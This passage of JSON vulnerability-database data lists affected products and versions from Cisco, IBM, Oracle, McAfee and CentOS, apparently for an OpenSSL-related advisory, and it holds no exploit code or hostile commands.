"vendor": "cisco", "version": null }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.3" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.1" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8." }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.4.7895" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.2.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8zh", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4.1102" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stored iq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "project openssl 0.9.8zf", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0x" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, 